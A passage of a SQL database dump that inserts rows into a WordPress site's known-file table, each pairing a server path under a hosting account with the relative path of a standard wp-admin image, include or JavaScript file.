(3311, '/home/equipm11/public_html/happythinking.com/wp-admin/images/marker.png', 'wp-admin/images/marker.png'),
(3312, '/home/equipm11/public_html/happythinking.com/wp-admin/images/mask.png', 'wp-admin/images/mask.png'),
(3313, '/home/equipm11/public_html/happythinking.com/wp-admin/images/media-button-2x.png', 'wp-admin/images/media-button-2x.png'),
(3314, '/home/equipm11/public_html/happythinking.com/wp-admin/images/media-button-image.gif', 'wp-admin/images/media-button-image.gif'),
(3315, '/home/equipm11/public_html/happythinking.com/wp-admin/images/media-button-music.gif', 'wp-admin/images/media-button-music.gif'),
(3316, '/home/equipm11/public_html/happythinking.com/wp-admin/images/media-button-other.gif', 'wp-admin/images/media-button-other.gif'),
(3317, '/home/equipm11/public_html/happythinking.com/wp-admin/images/media-button-video.gif', 'wp-admin/images/media-button-video.gif'),
(3318, '/home/equipm11/public_html/happythinking.com/wp-admin/images/media-button.png', 'wp-admin/images/media-button.png'),
(3319, '/home/equipm11/public_html/happythinking.com/wp-admin/images/menu-2x.png', 'wp-admin/images/menu-2x.png'),
(3320, '/home/equipm11/public_html/happythinking.com/wp-admin/images/menu-vs-2x.png', 'wp-admin/images/menu-vs-2x.png'),
(3321, '/home/equipm11/public_html/happythinking.com/wp-admin/images/menu-vs.png', 'wp-admin/images/menu-vs.png'),
(3322, '/home/equipm11/public_html/happythinking.com/wp-admin/images/menu.png', 'wp-admin/images/menu.png'),
(3323, '/home/equipm11/public_html/happythinking.com/wp-admin/images/no.png', 'wp-admin/images/no.png'),
(3324, '/home/equipm11/public_html/happythinking.com/wp-admin/images/post-formats-vs.png', 'wp-admin/images/post-formats-vs.png'),
(3325, '/home/equipm11/public_html/happythinking.com/wp-admin/images/post-formats.png', 'wp-admin/images/post-formats.png'),
(3326, '/home/equipm11/public_html/happythinking.com/wp-admin/images/post-formats32-vs.png', 'wp-admin/images/post-formats32-vs.png'),
(3327, '/home/equipm11/public_html/happythinking.com/wp-admin/images/post-formats32.png', 'wp-admin/images/post-formats32.png'),
(3328, '/home/equipm11/public_html/happythinking.com/wp-admin/images/privacy.svg', 'wp-admin/images/privacy.svg'),
(3329, '/home/equipm11/public_html/happythinking.com/wp-admin/images/resize-2x.gif', 'wp-admin/images/resize-2x.gif'),
(3330, '/home/equipm11/public_html/happythinking.com/wp-admin/images/resize-rtl-2x.gif', 'wp-admin/images/resize-rtl-2x.gif'),
(3331, '/home/equipm11/public_html/happythinking.com/wp-admin/images/resize-rtl.gif', 'wp-admin/images/resize-rtl.gif'),
(3332, '/home/equipm11/public_html/happythinking.com/wp-admin/images/resize.gif', 'wp-admin/images/resize.gif'),
(3333, '/home/equipm11/public_html/happythinking.com/wp-admin/images/se.png', 'wp-admin/images/se.png'),
(3334, '/home/equipm11/public_html/happythinking.com/wp-admin/images/sort-2x.gif', 'wp-admin/images/sort-2x.gif'),
(3335, '/home/equipm11/public_html/happythinking.com/wp-admin/images/sort.gif', 'wp-admin/images/sort.gif'),
(3336, '/home/equipm11/public_html/happythinking.com/wp-admin/images/spinner-2x.gif', 'wp-admin/images/spinner-2x.gif'),
(3337, '/home/equipm11/public_html/happythinking.com/wp-admin/images/spinner.gif', 'wp-admin/images/spinner.gif'),
(3338, '/home/equipm11/public_html/happythinking.com/wp-admin/images/stars-2x.png', 'wp-admin/images/stars-2x.png'),
(3339, '/home/equipm11/public_html/happythinking.com/wp-admin/images/stars.png', 'wp-admin/images/stars.png'),
(3340, '/home/equipm11/public_html/happythinking.com/wp-admin/images/w-logo-blue.png', 'wp-admin/images/w-logo-blue.png'),
(3341, '/home/equipm11/public_html/happythinking.com/wp-admin/images/w-logo-white.png', 'wp-admin/images/w-logo-white.png'),
(3342, '/home/equipm11/public_html/happythinking.com/wp-admin/images/wheel.png', 'wp-admin/images/wheel.png'),
(3343, '/home/equipm11/public_html/happythinking.com/wp-admin/images/wordpress-logo-white.svg', 'wp-admin/images/wordpress-logo-white.svg'),
(3344, '/home/equipm11/public_html/happythinking.com/wp-admin/images/wordpress-logo.png', 'wp-admin/images/wordpress-logo.png'),
(3345, '/home/equipm11/public_html/happythinking.com/wp-admin/images/wordpress-logo.svg', 'wp-admin/images/wordpress-logo.svg'),
(3346, '/home/equipm11/public_html/happythinking.com/wp-admin/images/wpspin_light-2x.gif', 'wp-admin/images/wpspin_light-2x.gif'),
(3347, '/home/equipm11/public_html/happythinking.com/wp-admin/images/wpspin_light.gif', 'wp-admin/images/wpspin_light.gif'),
(3348, '/home/equipm11/public_html/happythinking.com/wp-admin/images/xit-2x.gif', 'wp-admin/images/xit-2x.gif'),
(3349, '/home/equipm11/public_html/happythinking.com/wp-admin/images/xit.gif', 'wp-admin/images/xit.gif'),
(3350, '/home/equipm11/public_html/happythinking.com/wp-admin/images/yes.png', 'wp-admin/images/yes.png'),
(3351, '/home/equipm11/public_html/happythinking.com/wp-admin/import.php', 'wp-admin/import.php'),
(3352, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/admin-filters.php', 'wp-admin/includes/admin-filters.php'),
(3353, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/admin.php', 'wp-admin/includes/admin.php'),
(3354, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/ajax-actions.php', 'wp-admin/includes/ajax-actions.php'),
(3355, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/bookmark.php', 'wp-admin/includes/bookmark.php'),
(3356, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-automatic-upgrader-skin.php', 'wp-admin/includes/class-automatic-upgrader-skin.php'),
(3357, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-bulk-plugin-upgrader-skin.php', 'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),
(3358, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-bulk-theme-upgrader-skin.php', 'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),
(3359, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-bulk-upgrader-skin.php', 'wp-admin/includes/class-bulk-upgrader-skin.php'),
(3360, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-core-upgrader.php', 'wp-admin/includes/class-core-upgrader.php'),
(3361, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-custom-background.php', 'wp-admin/includes/class-custom-background.php'),
(3362, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-custom-image-header.php', 'wp-admin/includes/class-custom-image-header.php'),
(3363, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-file-upload-upgrader.php', 'wp-admin/includes/class-file-upload-upgrader.php'),
(3364, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-ftp-pure.php', 'wp-admin/includes/class-ftp-pure.php'),
(3365, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-ftp-sockets.php', 'wp-admin/includes/class-ftp-sockets.php'),
(3366, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-ftp.php', 'wp-admin/includes/class-ftp.php'),
(3367, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-language-pack-upgrader-skin.php', 'wp-admin/includes/class-language-pack-upgrader-skin.php'),
(3368, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-language-pack-upgrader.php', 'wp-admin/includes/class-language-pack-upgrader.php'),
(3369, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-pclzip.php', 'wp-admin/includes/class-pclzip.php'),
(3370, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-plugin-installer-skin.php', 'wp-admin/includes/class-plugin-installer-skin.php'),
(3371, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-plugin-upgrader-skin.php', 'wp-admin/includes/class-plugin-upgrader-skin.php'),
(3372, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-plugin-upgrader.php', 'wp-admin/includes/class-plugin-upgrader.php'),
(3373, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-theme-installer-skin.php', 'wp-admin/includes/class-theme-installer-skin.php'),
(3374, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-theme-upgrader-skin.php', 'wp-admin/includes/class-theme-upgrader-skin.php'),
(3375, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-theme-upgrader.php', 'wp-admin/includes/class-theme-upgrader.php'),
(3376, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-walker-category-checklist.php', 'wp-admin/includes/class-walker-category-checklist.php'),
(3377, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-walker-nav-menu-checklist.php', 'wp-admin/includes/class-walker-nav-menu-checklist.php'),
(3378, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-walker-nav-menu-edit.php', 'wp-admin/includes/class-walker-nav-menu-edit.php'),
(3379, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-ajax-upgrader-skin.php', 'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),
(3380, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-application-passwords-list-table.php', 'wp-admin/includes/class-wp-application-passwords-list-table.php'),
(3381, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-automatic-updater.php', 'wp-admin/includes/class-wp-automatic-updater.php'),
(3382, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-comments-list-table.php', 'wp-admin/includes/class-wp-comments-list-table.php'),
(3383, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-community-events.php', 'wp-admin/includes/class-wp-community-events.php'),
(3384, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-debug-data.php', 'wp-admin/includes/class-wp-debug-data.php'),
(3385, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-filesystem-base.php', 'wp-admin/includes/class-wp-filesystem-base.php'),
(3386, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-filesystem-direct.php', 'wp-admin/includes/class-wp-filesystem-direct.php'),
(3387, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-filesystem-ftpext.php', 'wp-admin/includes/class-wp-filesystem-ftpext.php'),
(3388, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-filesystem-ftpsockets.php', 'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),
(3389, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-filesystem-ssh2.php', 'wp-admin/includes/class-wp-filesystem-ssh2.php'),
(3390, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-importer.php', 'wp-admin/includes/class-wp-importer.php'),
(3391, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-internal-pointers.php', 'wp-admin/includes/class-wp-internal-pointers.php'),
(3392, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-links-list-table.php', 'wp-admin/includes/class-wp-links-list-table.php'),
(3393, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-list-table-compat.php', 'wp-admin/includes/class-wp-list-table-compat.php'),
(3394, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-list-table.php', 'wp-admin/includes/class-wp-list-table.php'),
(3395, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-media-list-table.php', 'wp-admin/includes/class-wp-media-list-table.php'),
(3396, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-ms-sites-list-table.php', 'wp-admin/includes/class-wp-ms-sites-list-table.php'),
(3397, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-ms-themes-list-table.php', 'wp-admin/includes/class-wp-ms-themes-list-table.php'),
(3398, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-ms-users-list-table.php', 'wp-admin/includes/class-wp-ms-users-list-table.php'),
(3399, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-plugin-install-list-table.php', 'wp-admin/includes/class-wp-plugin-install-list-table.php'),
(3400, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-plugins-list-table.php', 'wp-admin/includes/class-wp-plugins-list-table.php'),
(3401, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-post-comments-list-table.php', 'wp-admin/includes/class-wp-post-comments-list-table.php'),
(3402, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-posts-list-table.php', 'wp-admin/includes/class-wp-posts-list-table.php'),
(3403, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php', 'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php'),
(3404, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php', 'wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php'),
(3405, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-privacy-policy-content.php', 'wp-admin/includes/class-wp-privacy-policy-content.php'),
(3406, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-privacy-requests-table.php', 'wp-admin/includes/class-wp-privacy-requests-table.php'),
(3407, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-screen.php', 'wp-admin/includes/class-wp-screen.php'),
(3408, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-site-health-auto-updates.php', 'wp-admin/includes/class-wp-site-health-auto-updates.php'),
(3409, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-site-health.php', 'wp-admin/includes/class-wp-site-health.php'),
(3410, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-site-icon.php', 'wp-admin/includes/class-wp-site-icon.php');
INSERT INTO `wpou_wfknownfilelist` VALUES
(3411, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-terms-list-table.php', 'wp-admin/includes/class-wp-terms-list-table.php'),
(3412, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-theme-install-list-table.php', 'wp-admin/includes/class-wp-theme-install-list-table.php'),
(3413, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-themes-list-table.php', 'wp-admin/includes/class-wp-themes-list-table.php'),
(3414, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-upgrader-skin.php', 'wp-admin/includes/class-wp-upgrader-skin.php'),
(3415, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-upgrader-skins.php', 'wp-admin/includes/class-wp-upgrader-skins.php'),
(3416, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-upgrader.php', 'wp-admin/includes/class-wp-upgrader.php'),
(3417, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/class-wp-users-list-table.php', 'wp-admin/includes/class-wp-users-list-table.php'),
(3418, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/comment.php', 'wp-admin/includes/comment.php'),
(3419, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/continents-cities.php', 'wp-admin/includes/continents-cities.php'),
(3420, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/credits.php', 'wp-admin/includes/credits.php'),
(3421, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/dashboard.php', 'wp-admin/includes/dashboard.php'),
(3422, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/deprecated.php', 'wp-admin/includes/deprecated.php'),
(3423, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/edit-tag-messages.php', 'wp-admin/includes/edit-tag-messages.php'),
(3424, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/export.php', 'wp-admin/includes/export.php'),
(3425, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/file.php', 'wp-admin/includes/file.php'),
(3426, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/image-edit.php', 'wp-admin/includes/image-edit.php'),
(3427, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/image.php', 'wp-admin/includes/image.php'),
(3428, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/import.php', 'wp-admin/includes/import.php'),
(3429, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/list-table.php', 'wp-admin/includes/list-table.php'),
(3430, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/media.php', 'wp-admin/includes/media.php'),
(3431, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/menu.php', 'wp-admin/includes/menu.php'),
(3432, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/meta-boxes.php', 'wp-admin/includes/meta-boxes.php'),
(3433, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/misc.php', 'wp-admin/includes/misc.php'),
(3434, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/ms-admin-filters.php', 'wp-admin/includes/ms-admin-filters.php'),
(3435, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/ms-deprecated.php', 'wp-admin/includes/ms-deprecated.php'),
(3436, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/ms.php', 'wp-admin/includes/ms.php'),
(3437, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/nav-menu.php', 'wp-admin/includes/nav-menu.php'),
(3438, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/network.php', 'wp-admin/includes/network.php'),
(3439, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/noop.php', 'wp-admin/includes/noop.php'),
(3440, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/options.php', 'wp-admin/includes/options.php'),
(3441, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/plugin-install.php', 'wp-admin/includes/plugin-install.php'),
(3442, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/plugin.php', 'wp-admin/includes/plugin.php'),
(3443, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/post.php', 'wp-admin/includes/post.php'),
(3444, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/privacy-tools.php', 'wp-admin/includes/privacy-tools.php'),
(3445, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/revision.php', 'wp-admin/includes/revision.php'),
(3446, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/schema.php', 'wp-admin/includes/schema.php'),
(3447, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/screen.php', 'wp-admin/includes/screen.php'),
(3448, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/taxonomy.php', 'wp-admin/includes/taxonomy.php'),
(3449, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/template.php', 'wp-admin/includes/template.php'),
(3450, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/theme-install.php', 'wp-admin/includes/theme-install.php'),
(3451, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/theme.php', 'wp-admin/includes/theme.php'),
(3452, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/translation-install.php', 'wp-admin/includes/translation-install.php'),
(3453, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/update-core.php', 'wp-admin/includes/update-core.php'),
(3454, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/update.php', 'wp-admin/includes/update.php'),
(3455, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/upgrade.php', 'wp-admin/includes/upgrade.php'),
(3456, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/user.php', 'wp-admin/includes/user.php'),
(3457, '/home/equipm11/public_html/happythinking.com/wp-admin/includes/widgets.php', 'wp-admin/includes/widgets.php'),
(3458, '/home/equipm11/public_html/happythinking.com/wp-admin/index.php', 'wp-admin/index.php'),
(3459, '/home/equipm11/public_html/happythinking.com/wp-admin/install-helper.php', 'wp-admin/install-helper.php'),
(3460, '/home/equipm11/public_html/happythinking.com/wp-admin/install.php', 'wp-admin/install.php'),
(3461, '/home/equipm11/public_html/happythinking.com/wp-admin/js/accordion.js', 'wp-admin/js/accordion.js'),
(3462, '/home/equipm11/public_html/happythinking.com/wp-admin/js/accordion.min.js', 'wp-admin/js/accordion.min.js'),
(3463, '/home/equipm11/public_html/happythinking.com/wp-admin/js/application-passwords.js', 'wp-admin/js/application-passwords.js'),
(3464, '/home/equipm11/public_html/happythinking.com/wp-admin/js/application-passwords.min.js', 'wp-admin/js/application-passwords.min.js'),
(3465, '/home/equipm11/public_html/happythinking.com/wp-admin/js/auth-app.js', 'wp-admin/js/auth-app.js'),
(3466, '/home/equipm11/public_html/happythinking.com/wp-admin/js/auth-app.min.js', 'wp-admin/js/auth-app.min.js'),
(3467, '/home/equipm11/public_html/happythinking.com/wp-admin/js/code-editor.js', 'wp-admin/js/code-editor.js'),
(3468, '/home/equipm11/public_html/happythinking.com/wp-admin/js/code-editor.min.js', 'wp-admin/js/code-editor.min.js'),
(3469, '/home/equipm11/public_html/happythinking.com/wp-admin/js/color-picker.js', 'wp-admin/js/color-picker.js'),
(3470, '/home/equipm11/public_html/happythinking.com/wp-admin/js/color-picker.min.js', 'wp-admin/js/color-picker.min.js'),
(3471, '/home/equipm11/public_html/happythinking.com/wp-admin/js/comment.js', 'wp-admin/js/comment.js'),
(3472, '/home/equipm11/public_html/happythinking.com/wp-admin/js/comment.min.js', 'wp-admin/js/comment.min.js'),
(3473, '/home/equipm11/public_html/happythinking.com/wp-admin/js/common.js', 'wp-admin/js/common.js'),
(3474, '/home/equipm11/public_html/happythinking.com/wp-admin/js/common.min.js', 'wp-admin/js/common.min.js'),
(3475, '/home/equipm11/public_html/happythinking.com/wp-admin/js/custom-background.js', 'wp-admin/js/custom-background.js'),
(3476, '/home/equipm11/public_html/happythinking.com/wp-admin/js/custom-background.min.js', 'wp-admin/js/custom-background.min.js'),
(3477, '/home/equipm11/public_html/happythinking.com/wp-admin/js/custom-header.js', 'wp-admin/js/custom-header.js'),
(3478, '/home/equipm11/public_html/happythinking.com/wp-admin/js/customize-controls.js', 'wp-admin/js/customize-controls.js'),
(3479, '/home/equipm11/public_html/happythinking.com/wp-admin/js/customize-controls.min.js', 'wp-admin/js/customize-controls.min.js'),
(3480, '/home/equipm11/public_html/happythinking.com/wp-admin/js/customize-nav-menus.js', 'wp-admin/js/customize-nav-menus.js'),
(3481, '/home/equipm11/public_html/happythinking.com/wp-admin/js/customize-nav-menus.min.js', 'wp-admin/js/customize-nav-menus.min.js'),
(3482, '/home/equipm11/public_html/happythinking.com/wp-admin/js/customize-widgets.js', 'wp-admin/js/customize-widgets.js'),
(3483, '/home/equipm11/public_html/happythinking.com/wp-admin/js/customize-widgets.min.js', 'wp-admin/js/customize-widgets.min.js'),
(3484, '/home/equipm11/public_html/happythinking.com/wp-admin/js/dashboard.js', 'wp-admin/js/dashboard.js'),
(3485, '/home/equipm11/public_html/happythinking.com/wp-admin/js/dashboard.min.js', 'wp-admin/js/dashboard.min.js'),
(3486, '/home/equipm11/public_html/happythinking.com/wp-admin/js/edit-comments.js', 'wp-admin/js/edit-comments.js'),
(3487, '/home/equipm11/public_html/happythinking.com/wp-admin/js/edit-comments.min.js', 'wp-admin/js/edit-comments.min.js'),
(3488, '/home/equipm11/public_html/happythinking.com/wp-admin/js/editor-expand.js', 'wp-admin/js/editor-expand.js'),
(3489, '/home/equipm11/public_html/happythinking.com/wp-admin/js/editor-expand.min.js', 'wp-admin/js/editor-expand.min.js'),
(3490, '/home/equipm11/public_html/happythinking.com/wp-admin/js/editor.js', 'wp-admin/js/editor.js'),
(3491, '/home/equipm11/public_html/happythinking.com/wp-admin/js/editor.min.js', 'wp-admin/js/editor.min.js'),
(3492, '/home/equipm11/public_html/happythinking.com/wp-admin/js/farbtastic.js', 'wp-admin/js/farbtastic.js'),
(3493, '/home/equipm11/public_html/happythinking.com/wp-admin/js/gallery.js', 'wp-admin/js/gallery.js'),
(3494, '/home/equipm11/public_html/happythinking.com/wp-admin/js/gallery.min.js', 'wp-admin/js/gallery.min.js'),
(3495, '/home/equipm11/public_html/happythinking.com/wp-admin/js/image-edit.js', 'wp-admin/js/image-edit.js'),
(3496, '/home/equipm11/public_html/happythinking.com/wp-admin/js/image-edit.min.js', 'wp-admin/js/image-edit.min.js'),
(3497, '/home/equipm11/public_html/happythinking.com/wp-admin/js/inline-edit-post.js', 'wp-admin/js/inline-edit-post.js'),
(3498, '/home/equipm11/public_html/happythinking.com/wp-admin/js/inline-edit-post.min.js', 'wp-admin/js/inline-edit-post.min.js'),
(3499, '/home/equipm11/public_html/happythinking.com/wp-admin/js/inline-edit-tax.js', 'wp-admin/js/inline-edit-tax.js'),
(3500, '/home/equipm11/public_html/happythinking.com/wp-admin/js/inline-edit-tax.min.js', 'wp-admin/js/inline-edit-tax.min.js'),
(3501, '/home/equipm11/public_html/happythinking.com/wp-admin/js/iris.min.js', 'wp-admin/js/iris.min.js'),
(3502, '/home/equipm11/public_html/happythinking.com/wp-admin/js/language-chooser.js', 'wp-admin/js/language-chooser.js'),
(3503, '/home/equipm11/public_html/happythinking.com/wp-admin/js/language-chooser.min.js', 'wp-admin/js/language-chooser.min.js'),
(3504, '/home/equipm11/public_html/happythinking.com/wp-admin/js/link.js', 'wp-admin/js/link.js'),
(3505, '/home/equipm11/public_html/happythinking.com/wp-admin/js/link.min.js', 'wp-admin/js/link.min.js'),
(3506, '/home/equipm11/public_html/happythinking.com/wp-admin/js/media-gallery.js', 'wp-admin/js/media-gallery.js'),
(3507, '/home/equipm11/public_html/happythinking.com/wp-admin/js/media-gallery.min.js', 'wp-admin/js/media-gallery.min.js'),
(3508, '/home/equipm11/public_html/happythinking.com/wp-admin/js/media-upload.js', 'wp-admin/js/media-upload.js'),
(3509, '/home/equipm11/public_html/happythinking.com/wp-admin/js/media-upload.min.js', 'wp-admin/js/media-upload.min.js'),
(3510, '/home/equipm11/public_html/happythinking.com/wp-admin/js/media.js', 'wp-admin/js/media.js'),
(3511, '/home/equipm11/public_html/happythinking.com/wp-admin/js/media.min.js', 'wp-admin/js/media.min.js'),
(3512, '/home/equipm11/public_html/happythinking.com/wp-admin/js/nav-menu.js', 'wp-admin/js/nav-menu.js'),
(3513, '/home/equipm11/public_html/happythinking.com/wp-admin/js/nav-menu.min.js', 'wp-admin/js/nav-menu.min.js'),
(3514, '/home/equipm11/public_html/happythinking.com/wp-admin/js/password-strength-meter.js', 'wp-admin/js/password-strength-meter.js'),
(3515, '/home/equipm11/public_html/happythinking.com/wp-admin/js/password-strength-meter.min.js', 'wp-admin/js/password-strength-meter.min.js'),
(3516, '/home/equipm11/public_html/happythinking.com/wp-admin/js/password-toggle.js', 'wp-admin/js/password-toggle.js'),
(3517, '/home/equipm11/public_html/happythinking.com/wp-admin/js/password-toggle.min.js', 'wp-admin/js/password-toggle.min.js'),
(3518, '/home/equipm11/public_html/happythinking.com/wp-admin/js/plugin-install.js', 'wp-admin/js/plugin-install.js'),
(3519, '/home/equipm11/public_html/happythinking.com/wp-admin/js/plugin-install.min.js', 'wp-admin/js/plugin-install.min.js'),
(3520, '/home/equipm11/public_html/happythinking.com/wp-admin/js/post.js', 'wp-admin/js/post.js'),
(3521, '/home/equipm11/public_html/happythinking.com/wp-admin/js/post.min.js', 'wp-admin/js/post.min.js'),
(3522, '/home/equipm11/public_html/happythinking.com/wp-admin/js/postbox.js', 'wp-admin/js/postbox.js'),
(3523, '/home/equipm11/public_html/happythinking.com/wp-admin/js/postbox.min.js', 'wp-admin/js/postbox.min.js'),
(3524, '/home/equipm11/public_html/happythinking.com/wp-admin/js/privacy-tools.js', 'wp-admin/js/privacy-tools.js'),
(3525, '/home/equipm11/public_html/happythinking.com/wp-admin/js/privacy-tools.min.js', 'wp-admin/js/privacy-tools.min.js'),
(3526, '/home/equipm11/public_html/happythinking.com/wp-admin/js/revisions.js', 'wp-admin/js/revisions.js'),
(3527, '/home/equipm11/public_html/happythinking.com/wp-admin/js/revisions.min.js', 'wp-admin/js/revisions.min.js'),
(3528, '/home/equipm11/public_html/happythinking.com/wp-admin/js/set-post-thumbnail.js', 'wp-admin/js/set-post-thumbnail.js'),
(3529, '/home/equipm11/public_html/happythinking.com/wp-admin/js/set-post-thumbnail.min.js', 'wp-admin/js/set-post-thumbnail.min.js'),
(3530, '/home/equipm11/public_html/happythinking.com/wp-admin/js/site-health.js', 'wp-admin/js/site-health.js'),
(3531, '/home/equipm11/public_html/happythinking.com/wp-admin/js/site-health.min.js', 'wp-admin/js/site-health.min.js'),
(3532, '/home/equipm11/public_html/happythinking.com/wp-admin/js/site-icon.js', 'wp-admin/js/site-icon.js'),
(3533, '/home/equipm11/public_html/happythinking.com/wp-admin/js/site-icon.min.js', 'wp-admin/js/site-icon.min.js'),
(3534, '/home/equipm11/public_html/happythinking.com/wp-admin/js/svg-painter.js', 'wp-admin/js/svg-painter.js'),
(3535, '/home/equipm11/public_html/happythinking.com/wp-admin/js/svg-painter.min.js', 'wp-admin/js/svg-painter.min.js'),
(3536, '/home/equipm11/public_html/happythinking.com/wp-admin/js/tags-box.js', 'wp-admin/js/tags-box.js'),
(3537, '/home/equipm11/public_html/happythinking.com/wp-admin/js/tags-box.min.js', 'wp-admin/js/tags-box.min.js'),
(3538, '/home/equipm11/public_html/happythinking.com/wp-admin/js/tags-suggest.js', 'wp-admin/js/tags-suggest.js'),
(3539, '/home/equipm11/public_html/happythinking.com/wp-admin/js/tags-suggest.min.js', 'wp-admin/js/tags-suggest.min.js'),
(3540, '/home/equipm11/public_html/happythinking.com/wp-admin/js/tags.js', 'wp-admin/js/tags.js'),
(3541, '/home/equipm11/public_html/happythinking.com/wp-admin/js/tags.min.js', 'wp-admin/js/tags.min.js'),
(3542, '/home/equipm11/public_html/happythinking.com/wp-admin/js/theme-plugin-editor.js', 'wp-admin/js/theme-plugin-editor.js'),
(3543, '/home/equipm11/public_html/happythinking.com/wp-admin/js/theme-plugin-editor.min.js', 'wp-admin/js/theme-plugin-editor.min.js'),
(3544, '/home/equipm11/public_html/happythinking.com/wp-admin/js/theme.js', 'wp-admin/js/theme.js'),
